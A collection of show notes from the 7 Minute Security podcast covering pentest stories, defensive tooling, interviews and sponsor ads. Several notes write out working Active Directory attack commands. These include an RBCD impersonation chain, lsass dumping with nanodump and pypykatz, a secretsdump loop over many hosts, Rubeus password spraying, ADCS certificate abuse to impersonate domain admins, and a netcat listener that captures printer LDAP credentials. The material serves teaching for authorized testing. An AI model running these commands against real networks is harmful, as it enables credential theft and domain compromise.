SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Happy belated Thanksgiving! This is not a brag or a flex, but this episode covers a coveted achievement I haven't achieved in my whole life...until now: TDAD: Triple Domain Admin Dance!!!!1111!!!1!1!!!! We talk about the fun attack path that led to the TDAD (hint: always check Active Directory user description fields!), as well as a couple quick, non-spoilery reviews of a few movies: V for Vendetta and The Black Phone.

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today we're talking about tales of pentest pwnage - specifically how much fun printers can be to get Active Directory creds. TLDL: get into a printer interface, adjust the LDAP lookup IP to be your Kali box, run nc -lvp 389 on your Kali box, and then "test" the credentials via the printer interface in order to (potentially) capture an Active Directory cred! Today we also define an achievement that's fun to unlock called DDAD: Double Domain Admin Dance.

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today we're talking about securing your mental health! I share some behind-the-scenes info about my own mental health challenges, and share a great tip a counselor gave me for getting into a good headspace before heading into a difficult conversation/situation.

Today’s episode of the 7 Minute Security podcast is brought to you by Blumira, which provides easy-to-use automated detection and response that can be set up in…well..about 7 minutes. Detect and resolve security threats faster, and prevent breaches. Try it free today at blumira.com/7ms. Hey friends, today we're giving you a first impressions look at a free easy asset management tool called Snipe-IT you can use to build your inventory with! Why is this important? Because it's the first critical security control! It might help to see this tool in action, so we invite you to check out our recent Twitch stream where we got it up and running in about 45 minutes.

Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms! Today we have a really fun interview with Nato Riley of Blumira. He cut his IT/security teeth working for a cell phone company, exorcising malware demons out of workstations, and even building an email-based SIEM. He has had a very cool career path that involves embracing newbness, pushing aside imposter syndrome, and even begging for jobs! I think this interview can best be summed up by a direct quote from Nato: "Things absolutely go wrong, and I think that's what deters people from trying. But just because something goes wrong, doesn't mean you're necessarily going to die from it. So why not try?"

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Hey friends! Today we talk about a SoSaaS (Spreadsheet on Steroids as a Service...not a real thing) that is helping 7MinSec be more organized - both from a project standpoint and from an "alert us when important things are due!" standpoint.

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. In today's episode we talk more about eating the security dog food (following the best practices we preach!). Specifically, we focus on keeping that bloated email inbox a little more lean and mean. There are lots of tools/services to help with this, but we had a blast playing with MailStore (not a sponsor but we'd like them to be:-).    

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit SafePass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today we talk about configuring your Active Directory with MFA protection thanks to AuthLite. In the tangent department, we give you a short, non-spoilery review of the film Smile.

Today we're excited to kick off a new series all about blue team bliss - in other words, we're talking about pentest stories where the blue team controls kicked our butt a little bit! Topics include: The ms-ds-machineaccount-quota value is not an "all or nothing" option! Check out Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Add workstations to domain. We installed LAPS on Twitch last week and it went pretty well! We'll do it again in an upcoming livestream. Defensive security tools that can interrupt the SharpHound collection! EDRs are pretty awesome at catching bad stuff - and going into full "shields up" mode when they're irritated!

Today we revisit a series we haven’t touched in a long time all about eating the security dog food. TLDL about this series is I often find myself preaching security best practices, but don’t always follow them as a consultancy. So today we talk about: How the internal 7MS infosec policy development is coming along Why I’m no longer going to be “product agnostic” going forward Some first impressions of a new tool I’m trying called ITGlue (not a sponsor) How to start building a critical asset list - and how it shouldn’t overlook things like domain names and LetsEncrypt certs Also, don’t forget we are doing weekly livestreams on security topics!

Hey friends! Today we're giving you a first impressions episode all about Airlock Digital, an application allowlisting solution. They were kind enough to let us play with it in our lab with the intention of exploring its bells and whistles, so we're excited to report back our findings in podcast form. TLDL: we really like this solution! It is easy to deploy (see this YouTube video for a quick walkthrough). Once I had it going in the lab, I tried administering it without reading any of the documentation, and figured out most of the workflows with ease. I just ran into a couple questions that the Airlock folks were great about answering quickly. I want to better understand the "Microsoft way" to do application allowlisting - using their standard offering or something like AaronLocker. But several colleagues have told me they had "OMG moments" where a C-level staff member suddenly needed to run something like ringcentral.exe and they weren't able to because of app blocklisting. It then becomes difficult to quickly allow that .exe to run without pushing GPO updates or having someone log in as local admin or something like that. But Airlock has a cool, killer feature to address this need...take a listen to today's program to learn more!

In today's episode we share some tips we've picked up in the last few weeks of pentesting, with hopes it will save you from at least a few rounds of smashing your face into the keyboard. Tips include: If you find yourself with "owns" rights to a bajillion hosts in BloodHound, this query will give you a nice list of those systems, one system per line: cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"' Then you can scan with nmap to find the "live" hosts: nmap -sn -iL targets.txt For resource based constrained delegation attacks, check out this episode of pwnage for some step-by-step instructions. If you have RBCD admin access to victim systems, don't forget that CrackMapExec support Kerberos! So you can do stuff like: cme smb VICTIM-SYSTEM -k --sam or cme smb VICTIM-SYSTEM -k -M wdigest -M ACTION=enable Take the time to search SMB shares with something like PowerHuntShares. If you have write access in places, drop an SCF file to capture/pass hashes! Looking to privilege escalate while RDP'd into a system? You owe it to yourself to check out KrbRelayUp! Ever find yourself with cracked hashcat passwords that look something like '$HEX[xxxx]'? Check this tweet from mpgn for a great cracking tip!

Today we're so excited to welcome Amanda Berlin, Lead Incident Detection Engineer at Blumira, back to the show (did you miss Amanda's first appearance on the show?  Check it out here)!  You might already be familiar with Amanda's awesome Defensive Security Handbook or her work with the Mental Health Hackers organization.  Today we virtually sat down to tackle a variety of topics and questions, including: What if HAFNIUM2 comes out today and only affects 2 specific versions of Exchange?  Does Blumira buy every software/hardware thingy out there and have an evil scientist lab where they test out all these different exploits, and then create detections for them? Can an old, out-of-touch security guy like me still find a place at the Vegas hacker conferences (even though I hate lines, heat, crowds and partying)?  Spoiler alert: yes. Are security vendors more likely to share their software/hardware security services with a defensive security group like Blumira, rather than pentesters like 7MinSec? Does Amanda think there's a gender bias in the security industry? Besides being aware of it happening, what can we do to cut down the bullying/secure-splaining/d-baggery/etc. in the industry?

Today's episode covers three remediation-focused topics that kind of grind my gears and/or get me frustrated with myself. I'm curious for your thoughts on these, so reach out via Slack or Twitter and maybe we'll do a future live stream on this topic. How do you get clients to actually care when we explain the threats on their network that are a literal 10/10 on the CVSS scale? Password policies - they're not just as easy as "Have a password of X length with Y complexity." Fixing the various broadcast traffic and protocol issues that give us easy wins with Responder and mitm6 - it's more nuanced than just "Disable LLMNR/NETBIOS/MDNS and shut off IPv6." This article discusses these challenges in more detail.

Hey friends, today we share the (hopefully) thrilling conclusion of last week's pentest. Here are some key points: If you find you have local admin on a bunch of privileges and want to quickly loop through a secretsdump of ALL systems and save the output to a text file, this little hacky script will do it! #!/bin/bash File="localadmin.txt" Lines=$(cat $File) for Line in $Lines do echo --- $Line --- >> dump.txt echo --------------------- >> dump.txt sudo python3 /opt/impacket/examples/secretsdump.py -k "$Line" >> dump.txt echo --------------------- >> dump.txt done From those dumps you can definitely try to crack the DCC hashes using a local or cloud cracker - see our series on this topic for some guidance. Got an NTLM hash for a privileged user and want to PS remote into a victim system? You can essentially do a PowerShell login pass-the-hash with evil-winrm! The Brute Ratel crisis monitor is awesome for watching a box and monitoring for people logging in and out of it (perfect for getting ready to strike with lsass dumps!)

Ok, ok, I know.  I almost always say something like "Today is my favorite tale of pentest pwnage."  And guess what?  Today is my favorite tale of pentest pwnage, and I don't even know how it's going to end yet, so stay tuned to next week's (hopefully) exciting conclusion.  For today, though, I've got some pentest tips to hopefully help you in your journeys of pwnage: PowerHuntShares is awesome at finding SMB shares and where you have read/write permissions on them.  Note there is a -Threads flag to adjust the intensity of your scan. Are your mitm6 attacks not working properly - even though they look like they should?  There might be seem LDAP/LDAPs protections in play.  Use LdapRelayScan to verify! Are you trying to abuse Active Directory Certificate Services attack ESC1 but things just don't seem to be working?  Make sure the cert you are forging is properly representing the user you are trying to spoof by using Get-LdapCurrentUser.ps1.  Also look at PassTheCert as another tool to abuse ADCS vulnerabilities. Example syntax for LdapCurrentUser: Get-LdapCurrentUser -certificate my.pfx -server my.domain.controller:636 -usessl -CertificatePassword admin If you manage to get your hands on an old Active Directory backup, this PowerShell snippet will help you get a list of users from the current domain, sorted by passwordlastset.  That way you can quickly find users who haven't changed their password since the AD backup: get-aduser -filter * -server victimdomain.local -properties pwdlastset,passwordlastset,enabled | where { $_.Enabled -eq $True} | select-object samaccountname,passwordlastset | sort-object passwordlastset

Hey friends, wow...we're up to thirty-nine episodes of pwnage? Should we make a cake when we hit the big 4-0?! Anyway, today's TLDL is this: If you get a nagging suspicion about something you find during enumeration, make sure to either come back to it later, or exhaust the path right away so you don't miss something! Because I did :-/ A tip that's been helping me speed along my use of CrackMapExec and other tools is by using Kerberos authentication. You can grab a ticket for your test AD account by using Impacket like so: gettgt.py victim.domain/LowPrivUser export KRB5CCNAME=LowPrivUser.ccache Then in most tools you can pass the cred by doing something like: crackmapexec smb DC01 -k In my enumeration of this network, I used Certipy to find potential attack paths against Active Directory Certificate Services. Something cool I learned is that Certipy will spit out both a text and json dump so you can import into BloodHound and then pair that data with their custom queries json file for beautiful visual potential pwnage! I ran into an issue where my certificate shenanigans resulted in an KDC_ERR_PADATA_TYPE_NOSUPP. I originally gave up on this attack path, only to learn about this awesome PassTheCert tool from this rad blog post! After initially being hesitant to use a tool I'd never heard of, I raised a GitHub issue to calm my nerves and, shortly after, found myself doing a domain admin dance. Oh, and although I didn't use it on this specific pentest, coercer is an awesome tool that helps you, ya know, coerce things!

Today we're joined by some of our friends at Arctic Wolf - Eugene Grant and Christopher Fielder - to talk about compliance. Now hold on - don't leave yet! I know for many folks, compliance makes them want to bleach their eyeballs. But compliance is super important - especially because it is not the same as being secure. So we discuss the differences between security and compliance, and practical work we can do to actually be more compliant and secure, including: Knowing what you have (assets, installed software, etc.) - Rumble is a cheap/free way to find out! Creating core policies and procedures that you will actually follow Learning about security frameworks that will help you build a security program from scratch Preparing for your first (or next) pentest. Tools like PingCastle and BloodHound can help find hacker low-hanging fruit! Knowing where your crown jewels are - be that data, a database, a key system, etc. Writing critical documentation - especially backup/restore procedures. Forming a security "dream team" to help drive your program Asking the right security maturity questions at your next job interview (so you don't get hired into a dumpster fire!) P.S. this is Christopher's sixth time on the program. Be sure to check out his first, second, third, fourth and fifth interviews with 7MS.

Hey friends, we have another fun tale of pwnage for you today. I loved this one because I got to learn some new tools I hadn't used before, such as: Get-InternalSubnets.ps1 - for getting internal subnets Adalanche for grabbing Active Directory info (similar to SharpHound) This tool worked well for me with this syntax: adalanche-windows-x64-v2022.5.19.exe collect activedirectory --domain victim.domain --port=389 --tlsmode=NoTLS Copernic Desktop Search for pillaging through shares with Google-like search capabilities! PowerHuntShares is my new favorite tool for enumerating network shares and associated permissions! CeWL for creating awesome wordlists to crack with! I don't have a Toyota TRD Pro, but I can't stop watching this reel.  

Today we're featuring a great interview with Matthew Warner, CTO and co-founder of Blumira. You might remember Matt from such podcasts as this one) when Matt gave us a fountain of info on why out-of-the-box Windows logging isn't awesome, and how to get it turned up to 11! Today, we talk about a cool report that Blumira put out called 2022 Blumira's State of Detection & Response, and dive into some interesting topics within it, including: How do companies like Blumira (who we rely on to stay on top of threats) keep their teams on top of threats? Why open source detections are a great starting point - but not a magic bullet Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend? Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do you use Digital Ocean for legit biz purposes? Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block? Common lateral movement tools/techniques Why honeypots rule!

In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the answers for: Do we have creds to log onto his computer? How about his email accounts? Do we have usernames/passwords for retirement accounts, bank accounts, etc.? For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles? Can we get into his phone to get key info off of text messages and grab phone #s of key contacts? What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial? Do we have redundancy in this plan, or is it all on paper in a file somewhere?

In today's episode we talk about Purple Knight, a free tool to help assess your organization's Active Directory security. I stuck Purple Knight in our Light Pentest LITE pentest training lab and did an informal compare-and-contrast of its detection capabilities versus PingCastle, which we talked about in depth in episode #489. 

Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before: cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking out this article, which has you set the following setting in GPO: Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible! In regards to defending against secretsdump, this article I found this article to be super interesting.

Today we're sharing an updates to episode #512 where we ran Rapid7's InsightIDR through a bunch of attacks: Active Directory enumeration via SharpHound Password spraying through Rubeus Kerberoasting and ASREPRoasting via Rubeus Network protocol poisoning with Inveigh. Looking for a free way to detect protocol poisoning? Check out CanaryPi. Hash dumping using Impacket. I also talk about an interesting Twitter thread that discusses the detection of hash dumping. Pass-the-hash attacks with CrackMapExec In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves: Getting Started with Rapid7 InsightIDR: A SIEM Tutorial Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented by video: https://www.youtube.com/watch?v=0-XAO32LEPY Shortly after recording this video, I found this awesome article which walks you through a different way to tackle these updates: List all upgrade profiles: esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml Grep for just the ones you want (in my case ESXi 7.x): esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0 Apply the one you want! esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0    

Well friends, it has been a while since we talked about Microsoft's awesome Local Administrator Password Solution - specifically, the last time was way back in 2017! Lately I've been training some companies on how to install it by giving them a live walkthrough in our Light Pentest LITE lab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go! (See the show notes for today's episode for more details!)

Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process.

Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD: # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources. Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!

Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include: Setting the right communication cadence - and communication channels - with a customer during a pentest. Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here). How we're using Intercom to publish self-help/FAQ articles for 7MS.

Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review: BloodHound edges DACL Trouble: Generic All on OUs AD prep bug in Windows Server 2016

Today we're pumped to share a featured interview with Amanda Berlin, Lead Incident Detection Engineer at Blumira. You might already be familiar with Amanda's awesome Defensive Security Handbook or fine work with Mental Health Hackers. We polled our Slack friends and structured this interview as an AAA (Ask Amanda Anything). That resulted in a really fun chat that covered many things technical and not technical! Questions we posed to Amanda include: Can you tell us more about your infosec superhero origin story and creation of your book? Will there ever be a new version of the Defensive Security Handbook? What blue team certs/YouTube vids/classes/conferences give the best bang for your buck? Was it a mistake to invent computers? From a logging standpoint, what devices provide blind spots (Linux systems, ioT devices, etc.)? You can wave a magic wand and solve any three security challenges instantly - what do you choose? Infosec Twitter drama. Love it? Leave it? Something inbetween? Tips to prevent business email compromise? How do we keep beloved family/friends (who keep falling prey to social engineering campaigns) safer on their computers and on the Web? Our company had a partial ransomware deployment a few years ago. Is changing Active Directory passwords changed and formatting affected systems enough? (Spoiler alert: no. See Microsoft's advice on the topic)

Today we're continuing a series we haven't done in a while (click here to see the whole series) all about building and deploying pentest dropboxes for customers. Specifically, we cover: Auto installing Splashtop This can be done automatically by downloading your splashtop.exe install and issuing this command: splashtop.exe prevercheck /s /i confirm_d=0,hidewindow=1,notray=0,req_perm=0,sec_opt=2 Auto installing Ninite This can be done in a batch script like so: agent.msi /quiet ninitepro.exe /select App1 App2 App3 /silent ninite-install-report.txt The above command installs App1, App2 and App3 silently and logs output to a file called ninite-install-report.txt Auto installing Uptimerobot monitoring We do this by first creating a script called c:\uptimerobot.ps1 that makes the "phone home" call to UptimeRobot: Start-Transcript -Path c:\heartbeat.log -Append Invoke-Webrequest https://heartbeat.uptimerobot.com/LONG-UNIQUE-STRING -UseBasicParsing Stop-Transcript Then we install the scheduled task itself like so: schtasks.exe /create /tn "Heartbeat" /tr "powershell -noprofile -executionpolicy bypass -file c:\uptimerobot.ps1" /rl highest /f /sc minute /mo 5 /ru "NT AUTHORITY\SYSTEM"

In today's episode I talk about a cool self-defense class I took a while ago which was all about less lethal methods of protecting/defending yourself. I also talk about some safer ways to handle/hide cash while traveling on vacation.

Today we continue the series we started a few years ago called Security Your Family During and After a Disaster (the last part in this series was from a few years ago. In today's episode we focus on some additional things you should be thinking about to strengthen the "in case of emergency" document you share with your close friends and family.

Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include: I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqnd Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error! Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold! LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it

Today we're joined by our friends Christopher Fielder and Jon Crotty from Arctic Wolf to talk about their interesting report on The State of Cybersecurity: 2022 Trends (note: you can get some of the report's key points here without needing to provide an email address). The three of us dig in to talk about some of the report's specific highlights, including: Many orgs are running the bare minimum (or nothing!) for endpoint protection Cyber insurance costs are going up, and some customers are unable to afford it - or they're getting dropped by their carrier altogether Security is still not getting a seat at the decision-making table in a lot of orgs, and already-overburned IT teams taking on security as part of their job descriptions as well Seems like everybody and their mom is moving infrastructure to the cloud, but few are managing that attack surface, thus increasing risk The cyber skills gap remains a challenge - many security gurus are looking to get out of their current position, leading many orgs to hire inexperienced teams who make rushed/misinformed decisions about security tools and services, thus making the org less secure P.S. this is Christopher's fifth time on the program. Be sure to check out his first, second, third and fourth interviews with 7MS.

Today I'm sharing some first impressions of the Rapid 7 InsightIDR as kind of a teaser for an eventual new chapter in our Desperately Seeking a Super SIEM for SMBs series. Disclaimer: remember these are first impressions. There may be some missed detections I talk about today that are a me problem and not the technology. I hope to get to the root of those unresolved issues by the time I talk more formally about InsightIDR in a future episode. Enjoy!

Today we're continuing our series focused on [owning a security consultancy], talking specifically about: How not to give up on warm sales leads, even if they haven't panned out for 5+ years! Some cool Mac tools that help me manage 7MS - such as Craft and OmniFocus A sneak peek at a SIEM vendor that will soon be featured in an episode of Desperately Seeking a Super SIEM for SMBs  

Today we share some first impressions of Tailscale, a service that advertises itself as "Zero config VPN. Installs on any device in minutes, manages firewall rules for you, and works from anywhere." Is it really that cool and easy? Listen to today's episode to find out!

Today we revisit our phishing series with a few important updates that help us run our campaigns more smoothly, such as creating a simple but effective fake O365 portal, and being aware that some email systems may "pre-click" malicious links before users ever actually do.

Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack. We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike, but you can compile standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it, you just have to create the folder first. So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this: # Windows system: tell your Windows system to trust the victim host you're about to PS into: winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"} # Windows system: PowerShell into the victim system Enter-PSSession -computername -Credential domain.com\pwneduser # Kali system: create and share a folder with nanodump.exe in it: sudo mkdir /share sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support # Victim system: copy nanodump from Kali box to VICTIM-SERVER copy \\YOUR.KALI.IP.ADDRESS\share\nano.exe c:\windows\temp\ # Victim system: get the PID for lsass.exe tasklist /FI "IMAGENAME eq lsass.exe" # Victim system: use nano to do the lsass dump c:\windows\temp\nano.exe --pid x --write c:\windows\temp\toteslegit.log # Victim system: Get the log back to your Kali share copy c:\windows\temp\toteslegit.log \\YOUR.KALI.IP.ADDRSS\share\ # Kali system: "fix" the dump and extract credz with mimikatz! sudo /opt/nanodump/restore_signature.sh winupdates1.log sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt Enjoy delicious passwords and hashes in the dump.txt file!

Today's featured interview is with Matthew Warner, CTO and co-founder of Blumira. We had a great chat about why out-of-the-box Windows logging isn't super awesome, "free" ways to get logging turned up to 11 (Microsoft's audit policy recommendations, sysmon, sysmon modular), as well as how to get better logging in hard-to-reach places like Kerberos. Be sure to also check out Blumira's resources on detecting Kerberoasting and simplifying Windows log collection and ongoing management with Poshim. And please check out the Webinar we did together which demonstrates some common pentest attacks - and how Blumira can detect them!

Today's my favorite tale of pentest pwnage (again)! This time we're talking about sAMAccountName spoofing specifically. We also talk about my always-under-construction list of things I try early in a pentest for maximum pwnage: Run PingCastle Do the SharpHound/BloodHound dumps Run the DHCP poisoning module of Responder Check the ms-DS-MachineAccountQuota value in the domain - if its at the default (10), then any user can add machines to the domain. Why is the ability to add machines to the domain important? Because in the case of the sAMAccountName spoofing, if you have a non-domain-joined machine like I do, you need the ability to add a computer object to the domain. Check the Pentestlab.blog article for more info, but essentially, if you have an unpatched domain controller and the ability to add computer objects to the domain, you can pull off the attack. The article goes into crazy good technical detail, and here's my not-so-technical explanation: If I was on a pentest, and the DC was called 7MS-DC01, and I could join a machine to the domain (which as a reminder - ANY user can do if the machine quota value is at the default value of 10), I could rename that machine account to be 7MS-DC01 without the dollar sign, request a TGT for the domain controller's account, then restore the machine name back to what it was before. Now, because the TGT is stored in memory, we can use the S4U2self Kerberos extension to request a service ticket using a domain admin account. And because the original ticket belong to the 7MS-DC01 machine name which now doesn't exist, Kerberos will look for 7MS-DC01$ and will issue the ticket for the requested service. I might've butchered that explanation mom, but I tried my best! TLDL/TLDR: find and exploit these unpatched domain controllers with noPac. Enjoy!

Hey friends, today I talk about the old school way I used to pwn wifi networks, then a more modern way, and then my new favorite way (spoiler alert: I use Bettercap).

Hey friends, today we're talking about how to monitor all your cloud thingies (Web servers, mail servers, etc.) with UptimeRobot. And I'm sharing some fun tips to monitor your internal thingies as well - without the use of any extra agent software.

Today's episode is all about Brute Ratel, a command and control center that is super cool, quick to setup, and much easier to use (IMHO) than Cobalt Strike. I also talk specifically about some of my favorite command line features, how slick and simple lateral movement is, and the "killer feature" that makes me giggle like the bad guy from Sonic the Hedgehog. In the tangent department, Mrs. 7MS makes an appearance via phone and I bore you to tears about my continued iFly addiction.

Happy new year friends! Today I share the good, bad, ugly, and BROKEN things I've come across while migrating our Light Pentest LITE training lab from on-prem VMware ESXi to Azure. It has been a fun and frustrating process, but my hope is that some of the tips in today's episode will save you some time/headaches/money should you setup a pentesting training camp in the cloud. Things I like No longer relying on a single point of failure (Intel NUC, switch, ISP, etc.) You can schedule VMs to auto-shutdown at a certain time each day, and even have Azure send you a notification before the shutdown so you can delay - or suspend altogether - the operation Things I don't like VMs are by default (I believe) joined to Azure AD, which I don't want. Here's how I got machines unjoined from Azure AD and then joined to my pwn.town domain: dsregcmd /leave Add-Computer -DomainName pwn.town -Restart Accidentally provision a VM in the wrong subnet? The fix may be rebuilding the flippin' VM (more info in today's episode). Just about every operation takes for freakin' ever. And it's confusing because if you delete objects out of the portal, sometimes they don't actually disappear from the GUI for like 5-30 minutes. Using backups and snapshots is archaic. You can take a snapshot in the GUI or PowerShell easy-peasy, but if you actually want to restore those snapshots you have to convert them to managed disks, then detach a VM's existing disk, and attach the freshly converted managed disks. This is a nightmare to do with PowerShell. Deleting data is a headache. I understand Azure is probably trying to protect you against deleting stuff and not being able to get it back, but they night a right-click > "I know what I'm doing, DELETE THIS NOW" option. Otherwise you can end up in situations where in order to delete data, you have to disable soft delete, undelete deleted data, then re-delete it to actually make it go away. WTH, you say? This doc will help it make more sense (or not). Things that are broken Promiscuous mode - just plain does not work as far as I can tell. So I can't do protocol poisoning exercises with something like Inveigh. Hashcat - I got CPU-based cracking working in ESXi by installing OpenCL drivers, but try as I may, I cannot get this working in Azure. I even submitted an issue to the hashcat forums but so far no replies. On a personal note, it has been good knowing you because I'm about to spend all my money on a new hobby: indoor skydiving.

Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows: Grab Certi Grab Certify Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed: msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands: sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do: rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!

HAPPY 500 EPISODES, FRIENDS! That's right, 7MS turned 5-0-0 today, and so we asked John Strand of Black Hills Information Security to join us and talk about all things security, including the John/BHIS superhero origin story, the future of pentesting, the (perceived) cybersecurity talent shortage, how to get started with good security practices in your organization, and more! P.S. check out John's first visit to the show here.

